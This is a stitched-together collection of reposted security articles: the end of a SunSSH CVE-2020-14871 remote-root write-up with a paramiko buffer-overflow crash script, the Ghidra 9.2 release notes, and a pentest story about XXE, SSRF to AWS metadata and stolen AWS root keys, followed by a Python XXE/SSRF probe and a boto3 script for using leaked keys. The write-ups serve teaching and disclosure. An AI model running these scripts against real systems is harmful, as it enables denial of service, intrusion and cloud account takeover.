 12:20pm  up 1 day(s), 18:40,  1 user,  load average: 0.03, 0.03, 0.03
helpdesk   pts/2        Nov 13 10:27    (unknown)
uid=0(root) gid=0(root)

References
[0] Live off the Land? How About Bringing Your Own Island? An Overview of UNC1945
[1] Assets Portfolio Update: 2014-10-06 attachment "Assets_Portfolio.pdf.zip"
[2] Vulnerable "pam_framework.c"
[3] sol-10-u11-ga-x86-dvd.iso download
[4] ROPgadget tool
[5] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
[6] Shodan SunSSH search

Sursa: https://hacker.house/lab/cve-2020-18471/
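The write-up notes that Python's paramiko (or another SSH library) can be used instead of libssh2 to drive the keyboard-interactive prompt. A minimal sketch of that idea - a crash trigger only, not the full ROP exploit; the target address is a placeholder lab host - could look like this:

import socket
import paramiko

def handler(title, instructions, prompt_list):
    # Answer "Please enter user name:" with more than 512 bytes to smash the
    # fixed-size username buffer in parse_user_name().
    return ["A" * 520 for _ in prompt_list]

sock = socket.create_connection(("192.168.11.120", 22))   # placeholder lab target
transport = paramiko.Transport(sock)
transport.start_client()

try:
    # An empty SSH username makes SunSSH fall back to the PAM username prompt.
    transport.auth_interactive("", handler)
except paramiko.SSHException as exc:
    # On a vulnerable host the remote sshd child core dumps and drops the connection.
    print("connection dropped (expected on a vulnerable host):", exc)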
  9. Change Log Ghidra v9.2 (November 2020) New Features Graphing. A new graph service and implementation was created. The graph service provides basic graphing capabilities. It was also used to generate several different types of graphs including code block graphs, call graphs, and AST graphs. In addition, an export graph service was created that supports various formats. (GP-211) PDB. Added a new, prototype, platform-independent PDB analyzer that processes and applies data types and symbols to a program from a raw (non-XML-converted) PDB file, allowing users to more easily take advantage of PDB information. (GT-3112) Processors. Added M8C SLEIGH processor specification. (GT-3052) Processors. Added support for the RISC-V processor. (GT-3389, Issue #932) Processors. Added support for the Motorola 6809 processor. (GT-3390, Issue #1201) Processors. Added CP1600-series processor support. (GT-3426, Issue #1383) Processors. Added V850 processor module. (GT-3523, Issue #1430) Improvements Analysis. Increased the speed of the Embedded Media Analyzer, which was especially poor for large programs, by doing better checking and reducing the number of passes over the program. (GT-3258) Analysis. Improved the performance of the RTTI analyzer. (GT-3341, Issue #10) Analysis. The handling of Exception records found in GCC-compiled binaries has been sped up dramatically. In addition, incorrect code disassembly has been corrected. (GT-3374) Analysis. Updated Auto-analysis to preserve work when encountering recoverable exceptions. (GT-3599) Analysis. Improved efficiency when creating or checking for functions and namespaces which overlap. (GP-21) Analysis. Added partial support of Clang for Windows. (GP-64) Analysis. RTTI structure processing speed has been improved with a faster technique for finding the root RTTI type descriptor. (GP-168, Issue #2075) API. The performance of adding large numbers of data types to the same category has been improved. (GT-3535) API. Added the BigIntegerNumberInputDialog that allows users to enter integer values larger than Integer.MAX_VALUE (2147483647). (GT-3607) API. Made JSON more available using GSON. (GP-89, Issue #1982) Basic Infrastructure. Introduced an extension point priority annotation so users can control extension point ordering. (GT-3350, Issue #1260) Basic Infrastructure. Changed file names in launch.bat to always run executables from System32. (GT-3614, Issue #1599) Basic Infrastructure. Unknown platforms now default to 64-bit. (GT-3615, Issue #1499) Basic Infrastructure. Updated sevenzipjbinding library to version 16.02-2.01. (GP-254) Build. Ghidra's native Windows binaries can now be built using Visual Studio 2019. (GT-3277, Issue #999) Build. Extension builds now exclude gradlew artifacts from zip file. (GT-3631, Issue #1763) Build. Reduced the number of duplicated help files among the build jar files. (GP-57, Issue #2144) Build. Git commit hash has been added to application.properties file for every build (not just releases). (GP-67) Contrib. Extensions are now installed to the user's settings directory, not the Ghidra installation directory. (GT-3639, Issue #1960) Data Types. Added mutability data settings (constant, volatile) for Enum datatype. (GT-3415) Data Types. Improved Structure Editor's Edit Component action to work on array pointers. (GP-205, Issue #1633) Decompiler. Added Secondary Highlights to the Decompiler. This feature allows the user to create a highlight for a token to show all occurrences of that token. 
Further, multiple secondary highlights are allowed at the same time, each using a unique color. See the Decompiler help for more information. (GT-3292, Issue #784) Decompiler. Added heuristics to the Decompiler to better distinguish whether a constant pointer refers to something in the CODE or DATA address space, for Harvard architectures. (GT-3468) Decompiler. Improved Decompiler analysis of local variables with small data types, eliminating unnecessary casts and mask operations. (GT-3525) Decompiler. Documentation for the Decompiler, accessible from within the Code Browser, has been rewritten and extended. (GP-166) Decompiler. The Decompiler can now display the namespace path (or part of it) of symbols it renders. With the default display configuration, the minimal number of path elements necessary are printed to fully resolve the symbol within the current scope. (GP-236) Decompiler. The Decompiler now respects the Charset and Translate settings for string literals it displays. (GP-237) Decompiler. The Decompiler's analysis of array accesses is much improved. It can detect more and varied access patterns produced by optimized code, even if the base offset is not contained in the array. Multi-dimensional arrays are detected as well. (GP-238, Issue #461, #1348) Decompiler. Extended the Decompiler's support for analyzing class methods. The class data type is propagated through the this pointer even in cases where the full prototype of the method is not known. The methods isThisPointer() and isHiddenReturn() are now populated in HighSymbol objects and are accessible in Ghidra scripts. (GP-239, Issue #2151) Decompiler. The Decompiler will now infer a string pointer from a constant that addresses the interior of a string, not just the beginning. (GP-240, Issue #1502) Decompiler. The Decompiler now always prints the full precision of floating-point values, using the minimal number of characters in either fixed point or scientific notation. (GP-241, Issue #778) Decompiler. The Decompiler's Auto Create Structure command now incorporates into new structures data-type information from function prototypes. The Auto Fill in Structure variant of the command will override undefined and other more general data-types with discovered data-types if they are more specific. (GP-242) Demangler. Modified Microsoft Demangler (MDMang) to handle symbols represented by MD5 hash codes when their normal mangled length exceeds 4096. (GT-3409, Issue #1344) Demangler. Upgraded the GNU Demangler to version 2.33.1. Added support for the now-deprecated GNU Demangler version 2.24 to be used as a fallback option for demangling. (GT-3481, Issue #1195, #1308, #1451, #1454) Demangler. The Demangler now more carefully applies information if generic changes have been made. Previously if the function signature had changed in any way from default, the demangler would not attempt to apply any information including the function name. (GP-12) Demangler. Changed MDMang so cast operator names are complete within the qualified function name, effecting what is available from internal API. (GP-13) Demangler. Added additional MDMang Extended Types such as char8_t, char16_t, and char32_t. (GP-14) Documentation. Removed Eclipse BuildShip instructions from the DevGuide. (GT-3634, Issue #1735) FID. Regenerated FunctionID databases. Added support for Visual Studio versions 2017 and 2019. (GP-170) Function Diff. Users may now add functions ad-hoc to existing function comparison panels. (GT-2229) Function Graph. 
Added Navigation History Tool option for Function Graph to signal it to produce fewer navigation history entries. (GT-3233, Issue #1115) GUI. Users can now view the Function Tag window to see all functions associated with a tag, without having to inspect the Listing. (GT-3054) GUI. Updated the Copy Special action to work on the current address when there is no selection. (GT-3155, Issue #1000) GUI. Significantly improved the performance of filtering trees in the Ghidra GUI. (GT-3225) GUI. Added many optimizations to increase the speed of table sorting and filtering. (GT-3226, Issue #500) GUI. Improved performance of bit view component recently introduced to Structure Editor. (GT-3244, Issue #1141) GUI. Updated usage of timestamps in the UI to be consistent. (GT-3286) GUI. Added tool actions for navigating to the next/previous functions in the navigation history. (GT-3291, Issue #475) GUI. Filtering now works on all tables in the Function Tag window. (GT-3329) GUI. Updated the Ghidra File Chooser so that users can type text into the list and table views in order to quickly jump to a desired file. (GT-3396) GUI. Improved the performance of the Defined Strings table. (GT-3414, Issue #1259) GUI. Updated Ghidra to allow users to set a key binding to perform an equivalent operation to double-clicking the XREF field in the Listing. See the Show Xrefs action in the Tool Options... Key Bindings section. (GT-3446) GUI. Improved mouse wheel scrolling in Listing and Byte Viewers. (GT-3473) GUI. Ghidra's action context mechanism was changed so that actions that modify the program are not accidentally invoked in the wrong context, thus possibly modifying the program in ways the user did not want or without the user knowing that it happened. This also fixed an issue where the navigation history drop-down menu did not represent the locations that would be used if the next/previous buttons were pressed. (GT-3485) GUI. Updated Ghidra tables to defer updating while analysis is running. (GT-3604) GUI. Updated Font Size options to allow the user to set any font size. (GT-3606, Issue #160, #1541) GUI. Added ability to overlay text on an icon. (GP-41) GUI. Updated Ghidra options to allow users to clear default key binding values. (GP-61, Issue #1681) GUI. ToggleDirectionAction button now shows in snapshot windows. (GP-93) GUI. Added a new action to the Symbol Tree to allow users to convert a Namespace to a Class. (GP-225, Issue #2301) Importer. Updated the XML Loader to parse symbol names for namespaces. (GT-3293) Importer:ELF. Added support for processing Android packed ELF Relocation Tables. (GT-3320, Issue #1192) Importer:ELF. Added ELF import opinion for ARM BE8. (GT-3642, Issue #1187) Importer:ELF. Added support for ELF RELR relocations, such as those produced for Android. (GP-348) Importer:MachO. DYLD Loader can now load x86_64 DYLD from macOS. (GT-3611, Issue #1566) Importer:PE. Improved parsing of Microsoft ordinal map files produced with DUMPBIN /EXPORTS (see Ghidra/Features/Base/data/symbols/README.txt). (GT-3235) Jython. Upgraded Jython to version 2.7.2. (GP-109) Listing. In the PCode field of the Listing, accesses of varnodes in the unique space are now always shown with the size of the access. Fixed bug which would cause the PCode emulator to reject valid pcode in rare instances. (GP-196) Listing:Data. Improved handling and display of character sequences embedded in operands or integer values. (GT-3347, Issue #1241) Multi-User:Ghidra Server. 
Added ability to specify initial Ghidra Server user password (-a0 mode only) for the svrAdmin add and reset commands. (GT-3640, Issue #321) Processors. Updated AVR8 ATmega256 processor model to reflect correct memory layout specification. (GT-933) Processors. Implemented semantics for vstmia/db vldmia/db, added missing instructions, and fixed shift value for several instructions for the ARM/Thumb NEON instruction set. (GT-2567) Processors. Added the XMEGA variant of the AVR8 processor with general purpose registers moved to a non-memory-mapped register space. (GT-2909) Processors. Added support for x86 SALC instruction. (GT-3367, Issue #1303) Processors. Implemented pcode for 6502 BRK instruction. (GT-3375, Issue #1049) Processors. Implemented x86 PTEST instruction. (GT-3380, Issue #1295) Processors. Added missing instructions to ARM language module. (GT-3394) Processors. Added support for RDRAND and RDSEED instructions to x86-32. (GT-3413) Processors. Improved x86 breakpoint disassembly. (GT-3421, Issue #872) Processors. Added manual index file for the M6809 processor. (GT-3449, Issue #1414) Processors. Corrected issues related to retained instruction context during a language upgrade. In some rare cases this retained context could interfere with the instruction re-disassembly. This context-clearing mechanism is controlled by a new pspec property: resetContextOnUpgrade. (GT-3531) Processors. Updated PIC24/PIC30 index file to match latest manual. Added support for dsPIC33C. (GT-3562) Processors. Added missing call-fixup to handle call side-effects for 32 bit gcc programs for get_pc_thunk.ax/si. (GP-10) Processors. Added ExitProcess to PEFunctionsThatDoNotReturn. (GP-35) Processors. External Disassembly field in the Listing now shows Thumb disassembly when appropriate TMode context has been established on a memory location. (GP-49) Processors. Changed RISC-V jump instructions to the more appropriate goto instead of call. (GP-54, Issue #2120) Processors. Updated AARCH64 to v8.5, including new MTE instructions. (GP-124) Processors. Added support for floating point params and return for SH4 processor calling conventions. (GP-183, Issue #2218) Processors. Added semantic support for many AARCH64 neon instructions. Addresses for register lanes are now precalculated, reducing the amount of p-code generated. (GP-343) Processors. Updated RISCV processor to include reorganization, new instructions, and fixes to several instructions. (GP-358, Issue #2333) Program API. Improved multi-threaded ProgramDB access performance. (GT-3262) Scripting. Improved ImportSymbolScript.py to import functions in addition to generic labels. (GT-3249, Issue #946) Scripting. Python scripts can now call protected methods from the GhidraScript API. (GT-3334, Issue #1250) Scripting. Updated scripting feature with better change detection, external jar dependencies, and modularity. (GP-4) Scripting. Updated the GhidraDev plugin (v2.1.1) to support Python Debugging when PyDev is installed via the Eclipse dropins directory. (GP-186, Issue #1922) Sleigh. Error messages produced by the SLEIGH compiler have been reformatted to be more consistent in layout as well as more descriptive and more consistent in providing line number information. (GT-3174) Bugs Analysis. Function start patterns found at 0x0, function signatures applied from the Data Type Manager at 0x0, and DWARF debug symbols applied at 0x0 will no longer cause stack traces. In addition, DWARF symbols with zero length address range no longer stack trace. 
(GT-2817, Issue #386, #1560) Analysis. Constant propagation will treat an OR with zero (0) as a simple copy. (GT-3548, Issue #1531) Analysis. Corrected Create Structure from Selection, which failed to use proper data organization during the construction process. This could result in improperly sized components such as pointers and primitive types. (GT-3587) Analysis. Fixed an issue where stored context is initializing the set of registers constantly. (GP-25) Analysis. Fixed an RTTI Analyzer regression when analyzing RTTI0 structures with no RTTI4 references to them. (GP-62, Issue #2153) Analysis. Fixed an issue where the RTTI analyzer was not filling out RTTI3 structures in some cases. (GP-111) API. Fixed NullPointerException when attempting to delete all bookmarks from a script. (GT-3405) API. Updated the Class Searcher so that Extension Points found in the Ghidra/patch directory get loaded. (GT-3547, Issue #1515) Build. Updated dependency fetch script to use HTTPS when downloading CDT. (GP-69, Issue #2173) Build. Fixed resource leak in Ghidra jar builder. (GP-342) Byte Viewer. Fixed Byte Viewer to correctly load the middle-mouse highlight color options change. (GT-3471, Issue #1464, #1465) Data Types. Fixed decoding of static strings that have a character set with a smaller character size than the platform's character size. (GT-3333, Issue #1255) Data Types. Correctly handle Java character sets that do not support the encoding operation. (GT-3407, Issue #1358) Data Types. Fixed bug that caused Data Type Manager Editor key bindings to get deleted. (GT-3411, Issue #1355) Data Types. Updated the DataTypeParser to handle data type names containing templates. (GT-3493, Issue #1417) Data Types. Corrected pointer data type isEquivalent() method to properly check the equivalence of the base data type. The old implementation could cause a pointer to be replaced by a conflicting pointer with the same name whose base datatype is not equivalent. This change has a negative performance impact associated with it and can cause additional conflict datatypes due to the rigid datatype relationships. (GT-3557) Data Types. Improved composite conflict resolution performance and corrected composite merge issues when composite bitfields and/or flexible arrays are present. (GT-3571) Data Types. Fixed bug in SymbolPathParser naive parse method that caused a less-than-adequate fall-back parse when angle bracket immediately followed the namespace delimiter. (GT-3620) Data Types. Corrected size of long for AARCH64 per LP64 standard. (GP-175) Decompiler. Fixed bug causing the Decompiler to miss symbol references when they are stored to the heap. (GT-3267) Decompiler. Fixed bug in the Decompiler that caused Deleting op with descendants exception. (GT-3506) Decompiler. Decompiler now correctly compensates for integer promotion on shift, division, and remainder operations. (GT-3572) Decompiler. Fixed handling of 64-bit implementations of alloca_probe in the Decompiler. (GT-3576) Decompiler. Default Decompiler options now minimize the risk of losing code when renaming or retyping variables. (GT-3577) Decompiler. The Decompiler no longer inherits a variable name from a subfunction if that variable incorporates additional data-flow unrelated to the subfunction. (GT-3580) Decompiler. Fixed the Decompiler Override Signature action to be enabled on the entire C-code statement. (GT-3636, Issue #1589) Decompiler. 
Fixed frequent ClassCast and IllegalArgument exceptions when performing Auto Create Structure or Auto Create Class actions in the Decompiler. (GP-119) Decompiler. Fixed a bug in the Decompiler that caused different variables to be assigned the same name in rare instances. (GP-243, Issue #1995) Decompiler. Fixed a bug in the Decompiler that caused PTRSUB off of non-pointer type exceptions. (GP-244, Issue #1826) Decompiler. Fixed a bug in the Decompiler that caused load operations from volatile memory to be removed as dead code. (GP-245, Issue #393, #1832) Decompiler. Fixed a bug causing the Decompiler to miss a stack alias if its offset was, itself, stored on the stack. (GP-246) Decompiler. Fixed a bug causing the Decompiler to lose Equate references to constants passed to functions that were called indirectly. (GP-247) Decompiler. Addressed various situations where the Decompiler unexpectedly removes active instructions as dead code after renaming or retyping a stack location. If the location was really an array element or structure field, renaming forced the Decompiler to treat the location as a distinct variable. Subsequently, the Decompiler thought that indirect references based before the location could not alias any following stack locations, which could then by considered dead. As of the 9.2 release, the Decompiler's renaming action no longer switches an annotation to forcing if it wasn't already. A retyping action, although it is forcing, won't trigger alias blocking for atomic data-types (this is configurable). (GP-248, Issue #524, #873) Decompiler. Fixed decompiler memory issues reported by a community security researcher. (GP-267) Decompiler. Fix for Decompiler error: Pcode: XML comms: Missing symref attribute in <high> tag. (GP-352, Issue #2360) Decompiler. Fixed bug preventing the Decompiler from seeing Equates attached to compare instructions. (GP-369, Issue #2386) Demangler. Fixed the GnuDemangler to parse the full namespace for operator symbols. (GT-3474, Issue #1441, #1448) Demangler. Fixed numerous GNU Demangler parsing issues. Most notable is the added support for C++ Lambda functions. (GT-3545, Issue #1457, #1569) Demangler. Updated the GNU Demangler to correctly parse and apply C++ strings using the unnamed type syntax. (GT-3645) Demangler. Fixed duplicate namespace entry returned from getNamespaceString() on DemangledVariable. (GT-3646, Issue #1729) Demangler. Fixed a GnuDemangler ClassCastException when parsing a typeinfo string containing operator text. (GP-160, Issue #1870, #2267) Demangler. Added stdlib.h include to the GNU Demangler to fix a build issue on some systems. (GP-187, Issue #2294) DWARF. Corrected DWARF relocation handling where the address image base adjustment was factored in twice. (GT-3330) File Formats. Fixed a potential divide-by-zero exception in the EXT4 file system. (GT-3400, Issue #1342) File Formats. Fixed date and time parsing of dates in cdrom iso9660 image files. (GT-3451, Issue #1403) Graphing. Fixed a ClassCastException sometimes encountered when performing Select -> Scoped Flow -> Forward Scoped Flow. (GP-180) GUI. Fixed inconsistent behavior with the interactive python interpreter's key bindings. (GT-3282) GUI. Fixed Structure Editor bug that prevented the F2 Edit action from editing the correct table cell after using the arrow keys. (GT-3308, Issue #703) GUI. Updated the Structure Editor so the Delete action is put into a background task to prevent the UI from locking. (GT-3352) GUI. 
Fixed IndexOutOfBoundsException when invoking column filter on Key Bindings table. (GT-3445) GUI. Fixed the analysis log dialog to not consume all available screen space. (GT-3610) GUI. Fixed issue where Location column, when used in the column filters, resulted in extraneous dialogs popping up. (GT-3623) GUI. Fixed Data Type Preview copy action so that newlines are preserved; updated table export to CSV to escape quotes and commas. (GT-3624) GUI. Fixed tables in Ghidra to copy the text that is rendered. Some tables mistakenly copied the wrong value, such as the Functions Table's Function Signature Column. (GT-3629, Issue #1628) GUI. Structure editor name now updates in title bar and tab when structure is renamed. (GP-19) GUI. Fixed an issue where drag-and-drop import locks the Windows File Explorer source window until the import dialog is closed by the user. (GP-27) GUI. Fixed an issue in GTreeModel where fireNodeChanged had no effect. This could result in stale node information and truncation of the text associated with a node in a GTree. (GP-30) GUI. Fixed an issue where the file chooser directory list truncated filenames with ellipses on HiDPI Windows. (GP-31) GUI. Fixed an uncaught exception when double-clicking on UndefinedFunction_ in Decompiler window. (GP-40) GUI. Updated error handling to only show one dialog when a flurry of errors is encountered. (GP-65, Issue #2185) GUI. Fixed an issue where Docking Windows are restored incorrectly if a snapshot is present. (GP-92) GUI. Fixed a File Chooser bug causing a NullPointerException for some users. (GP-171, Issue #1706) GUI. Fixed an issue that caused the script progress bar to appear intermittently. (GP-179, Issue #1819) GUI. Fixed a bug that caused Call Tree nodes to go missing when showing more than one function with the same name. (GP-213, Issue #1682) GUI:Project Window. Fixed Front End copy action to allow for the copy of program names so that users can paste those names into external applications. (GT-3403, Issue #1257) Headless. Headless Ghidra now properly honors the -processor flag, even if the specified processor is not a valid opinion. (GT-3376, Issue #1311) Importer. Corrected an NeLoader flags parsing error. (GT-3381, Issue #1312) Importer. Fixed the File -> Add to Program... action to not show a memory conflict error when the user is creating an overlay. (GT-3491, Issue #1376) Importer. Updated the XML Importer to apply repeatable comments. (GT-3492, Issue #1423) Importer. Fixed issue in Batch Import where only one item of a selection was removed when attempting to remove a selection of items. (GP-138) Importer. Corrected various issues with processing crushed PNG images. (GP-146, Issue #1854, #1874, #1875, #2252) Importer. Fixed RuntimeException occurrence when trying to load NE programs with unknown resources. (GP-182, Issue #1596, #1713, #2012) Importer. Fixed batch import to handle IllegalArgumentExceptions thrown by loaders. (GP-227, Issue #2328) Importer:ELF. Corrected ELF relocation processing for ARM BE8 (mixed-endian). (GT-3527, Issue #1494) Importer:ELF. Corrected ELF relocation processing for R_ARM_PC24 (Type: 1) that was causing improper flow in ARM disassembly. (GT-3654) Importer:ELF. Corrected ELF import processing of DT_JMPREL relocations and markup of associated PLT entries. (GP-252, Issue #2334) Importer:PE. Fixed an IndexOutOfBoundsException in the PeLoader that occurred when the size of a section extends past the end of the file. (GT-3433, Issue #1371) Listing:Comments. 
Fixed bug in Comment field that prevented navigation when clicking on an address or symbol where tabs were present in the comment. (GT-3440) Memory. Fixed bug where sometimes random bytes are inserted instead of 0x00 when expanding a memory block. (GT-3465) Processors. Corrected the offset in SuperH instructions generated by sign-extending a 20-bit immediate value composed of two sub-fields. (GT-3251, Issue #1161) Processors. Fixed AVR8 addition/subtraction flag macros. (GT-3276) Processors. Corrected XGATE ROR instruction semantics. (GT-3278) Processors. Corrected semantics for SuperH movi20 and movi20s instructions. (GT-3337, Issue #1264) Processors. Corrected SuperH floating point instruction token definition. (GT-3340, Issue #1265) Processors. Corrected SuperH movu.b and movu.w instruction semantics. (GT-3345, Issue #1271) Processors. Corrected AVR8 lpm and elpm instruction semantics. (GT-3346, Issue #631) Processors. Corrected pcode for the 6805 BSET instruction. (GT-3366, Issue #1307) Processors. Corrected ARM constructors for instructions vnmla, vnmls, and vnmul. (GT-3368, Issue #1277) Processors. Corrected bit-pattern for ARM vcvt instruction. (GT-3369, Issue #1278) Processors. Corrected TriCore abs instructions. (GT-3379, Issue #1286) Processors. Corrected x86 BT instruction semantics. (GT-3423, Issue #1370) Processors. Fixed issue where CRC16C LOAD/STOR with abs20 were not mapped correctly. (GT-3529, Issue #1518) Processors. Fixed M68000 MOVE USP,x and MOVE x,USP opcodes. (GT-3594, Issue #1593) Processors. Fixed the ARM/Thumb TEQ instruction pcode to be an XOR. (GP-23, Issue #1802) Processors. Emulation was broken by a regression in version 9.1.2. Emulation and Sleigh Pcodetests now work correctly. (GP-24, Issue #1579) Processors. Fixed carry flag issue for 6502 CMP, CPX, and CPY instructions. (GP-34) Processors. Corrected the SuperH high-order bit calculation for the rotr instruction. (GP-47) Processors. Corrected ELF ARM relocation processing for type 3 (R_ARM_REL32) and added support for type 42 (R_ARM_PREL31). (GP-164, Issue #2261, #2276) Scripting. Moved Jython cache directory out of tmp. (GP-36) Scripting. Fixed a NoClassDefFoundError when compiling GhidraScript under JDK14. (GP-59, Issue #2152) Scripting. Fixed issues with null result when searching for the script directory. (GP-103, Issue #2187) Scripting. Fixed scripting issue where, if there were non-ASCII characters in the user path, Jython would not work. (GP-204, Issue #1890) Sleigh. Corrected IndexOutOfBoundsException in SLEIGH when doing simple assignment in disassembly actions block. (GT-3382, Issue #745) Symbol Tree. Fixed the Symbol Tree so that clicking an already-selected symbol node will still trigger a Listing navigation. (GT-3436, Issue #453) Symbol Tree. Fixed the Symbol Tree to not continuously rebuild while performing Auto-analysis. (GT-3542) Version Tracking. Fixed Version Tracking Create Manual Match action. (GT-3305, Issue #2215) Version Tracking. Fixed a NullPointerException encountered when changing the Version Tracking options for the Listing Code Comparison when no data was loaded. (GT-3437, Issue #1143) Version Tracking. Fixed Version Tracking exception triggered in the Exact Functions Instructions Match correlator encountered when the two functions being compared differed in their number of instructions. (GT-3438, Issue #1352) Sursa: https://ghidra-sre.org/releaseNotes_9.2.html
10. Unique XXE to AWS Keys journey

BrOoDkIlLeR · 1 day ago · 7 min read

Spanish version: here

Always trust your feelings and try everything, even if you think it's crazy or will not work… it may work. If you run out of ideas, step away and they will come.

I was asked to do a private web pentest (too bad it was not a bugbounty program). It was my first paid one, so I wanted to do it as well as I could. The client is a company with a presence in 15+ countries, 120+ clients worldwide and 12+ million end users. So that's a lot. I will go directly to the relevant results, so don't think it was all open doors. When I ask you a question or there is an image, please take a moment to think about what you would do next before reading what I did; take it as practice.

I was given a domain to test and a user/password, so let's get started. At first sight I could see the application is huge and very robust. It has many functions to test and many profiles, so I started running a basic dirsearch just to see what is there in the background. Some xml configuration files appeared, implying there is a Tomcat somewhere. Reading the contents of the xml file I noticed a <url-pattern> tag, so my instinct told me to try some GET requests with Burp to see what response I would get.

GET Request / Response

The response has a Server: nginx header… so what does this architecture look like? Like this:

Part of client's architecture

So the endpoint exists, but it did not like the GET request type, so I tried POST.

POST Request / Response

In the response you can see there is a Content-Type header with a text/xml value, so the response should contain valid XML. In this case I only got a "Could not access envelope: Unable to create…" error. So, what would you try? I went directly to the worst-case scenario I could think of: an XXE vulnerability. So I got some XXE payloads by googling "XXE payloads". I added a Content-Type request header with text/xml (because that is what the server is expecting and I have to tell it what the hell I am sending) and I copypasted the very first payload, which tries to access the /etc/passwd file. And this happened:

First XXE Payload used with POST Request / Response

So what's going on? The response code was 200 (OK). It seems like the server is trying to read the contents of the /etc/passwd file and build a valid XML file to craft a response, but the final XML is not well formed because something in line 33 of /etc/passwd breaks parsing. Now we know that maybe the /etc/passwd file has 33 lines. I asked the client that and he confirmed that the web server has a /etc/passwd file that is 33 lines long. So the next thing is to try to get the contents and we are done! Until now, in a bugbounty program this may not be considered a POC, because we cannot do any harm to anyone with this. So you must keep digging until you have some hot potato.

I made an SSRF request and it worked! I knew port 8080 is the default port for a Tomcat server, and I knew the backend address from the Google Chrome console. In the first payload sent, when I got the 405 error, it showed this:

Chrome's console showing backend IP:port

So I tried that SSRF at the backend server (Tomcat) on localhost (127.0.0.1) and port 8080 (default). The server made a request to itself to obtain the external DTD and answered with an error. It tried to parse the HTML I requested and raised an error. Later I found the HTML code was this:

Note the missing </meta> tag that breaks XML parsing

So I tried another port to see how it behaves:

SSRF Connection refused because port 8081 is closed

So port 8081 is closed.
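The exact payloads from the engagement are only shown as screenshots in the original post, so here is an illustrative Python sketch of the idea (the endpoint, entity name and payload shape are placeholders, not the real ones): probing the endpoint for XXE/SSRF by pointing an external entity at a file path or an internal host:port and watching how the error changes.

import requests

TARGET = "https://redacted.example/redacted"   # placeholder endpoint

def probe(resource):
    payload = (
        '<?xml version="1.0"?>'
        '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{}"> ]>'
        '<foo>&xxe;</foo>'
    ).format(resource)
    r = requests.post(TARGET, data=payload,
                      headers={"Content-Type": "text/xml"}, timeout=10)
    return r.status_code, r.text[:200]

# File read attempt (in the write-up, parsing broke on line 33 of /etc/passwd)
print(probe("file:///etc/passwd"))

# SSRF-style probes against the backend Tomcat: open vs. closed ports error differently
for port in (8080, 8081):
    print(port, probe("http://127.0.0.1:{}/".format(port)))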
We can check every port with Burp Intruder and see the responses (it's like nmap, but over HTTP) just to check what other services are there (until now we only knew about port 8080). There were at least 8 ports open (I only tried the nmap top 1000).

So I wanted to get some juicy file contents, and here comes the "try harder" part. I tried maaany payloads (except DoS ones) one by one, modified them in every way I could think of, tried wrappers like file://, php://, dict://, expect:// etc., but they were disabled, read many writeups, and nothing… until I managed to make one payload work, but with a UNIQUE TWIST. The mechanism looks like this:

Credits: securityboulevard.com

So, instead of sending the request with the whole XML file at once like before, some part of it is hosted on my own host (an External DTD). So the web application has to gather all the parts of the XML to understand it and then produce some response (we already demonstrated local resource access with SSRF, but.. what about internet resources?).

Payload sent in POST Request

External DTD — &#x25; is % encoded; if not, it breaks parsing

What do you see in the External DTD that's weird? I hosted the External DTD file (a.dtd) on my own host. The weird part is that I didn't request the /etc/passwd file (I did it like before and received the same "Error on line 33…" response). I requested / and this was the response:

Response for file:/// request

Wait, WHAT? YES! That's the weird and amazing part! Instead of getting an error, I got a directory listing! I had never read or heard of this behavior before in any writeup, but this is GOLD! Do you know why it happens? I didn't… some days after this I found this. It seems that Java lists directory contents when a directory is requested instead of a file. So instead of trying to guess some files and directories, I took my time to manually browse many folders to gain more impact. I ended up finding a lot of private keys, config files, sensitive data, third-party service passwords, client information, etc. But the most important data I found was… AWS credentials! I tried to get some through the AWS metadata but received ones with 0 (zero) privileges. In a folder like /xxx/xxx/xxx/xxx/credentials was this:

AWS Access key & Secret Key

I rushed to find out what privileges they had with PACU and the AWS CLI. It turned out that they had root access, so… what's juicier than that?

AWS Access Keys Privileges

What would you do with that kind of access? For example, a cybercriminal could:

- Change instance states: he could terminate all of them (there is no more service, or.. no more Company?), start, stop or create new ones
- Make use of them (mine bitcoins, deploy backdoors, scripts). Imagine the billing…
- Steal data (credit cards, personal information)
- Deny access
- Anything…

So, just to check, since the application is hosted on an AWS EC2 instance (just a cloud computer hosted in Amazon's datacenter), I tried to access its metadata through SSRF like before. It also worked! (with the external DTD, not with the basic payload, requesting http://169.254.169.254/latest/meta-data/iam instead of file:///)

SSRF to http://169.254.169.254/latest/meta-data/iam

At this point the contents of /etc/passwd were trivial.

Conclusions

I am super happy with the results I got. I managed to find some other things like XSS, outdated software and some more.
So I learnt:

- XXE
- SSRF
- Port scanning with SSRF
- Proxy / Backend architecture
- To have patience

Takeaways

- Always try to escalate bugs and go as deep as you can
- Do manual testing; so far I have gotten the best results that way rather than by automating (it was useful for the port scanning part with SSRF)
- When you face a problem, try all the things that come to your mind like I did (a lot will come if you have read writeups and information consciously, and suddenly all the dots and info come together to aid you!!)
- Be organized and take notes & screenshots (maybe the client fixes the problem in the meantime and you have nothing otherwise)
- If you get stuck, take some time off and come back with fresh new ideas
- Try to chain the bugs or vulnerabilities you found and use them together to your advantage
- We know nothing (right? this is a neverending learning journey), so ask for help, advice or directions if you need to (you can do it in an anonymous way too)
- Be ethical and humble with the client; they have developers / infra people who are human and make mistakes like we do. Work with them to solve the issues
- Learn from all the things you did. Notice that if you have to do some testing on similar infrastructure, you already have experience! You will go directly to the hot part!
- Take some time off and sleep well; your brain will continue to process everything you have learned so far
- Share with the community!

Hope you enjoyed, thanks for reading so far!!!

Sursa: https://medium.com/@estebancano/unique-xxe-to-aws-keys-journey-afe678989b2b
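The write-up above checks the leaked keys with PACU and the AWS CLI; as an alternative illustration (not what the author ran), a short boto3 sketch for confirming which principal the keys map to and whether they can enumerate EC2 might look like this - the key values are placeholders:

import boto3

session = boto3.Session(
    aws_access_key_id="AKIAXXXXXXXXXXXXXXXX",                  # placeholder
    aws_secret_access_key="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",  # placeholder
)

# "Whoami": confirms the account and principal the leaked keys belong to
print(session.client("sts").get_caller_identity())

# A read-only call that hints at EC2-level privileges (instance control was the big risk above)
ec2 = session.client("ec2", region_name="us-east-1")
for reservation in ec2.describe_instances()["Reservations"]:
    for instance in reservation["Instances"]:
        print(instance["InstanceId"], instance["State"]["Name"])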
11. bdshemu: The Bitdefender shellcode emulator

Nov 11, 2020 • Andrei Lutas

Introduction

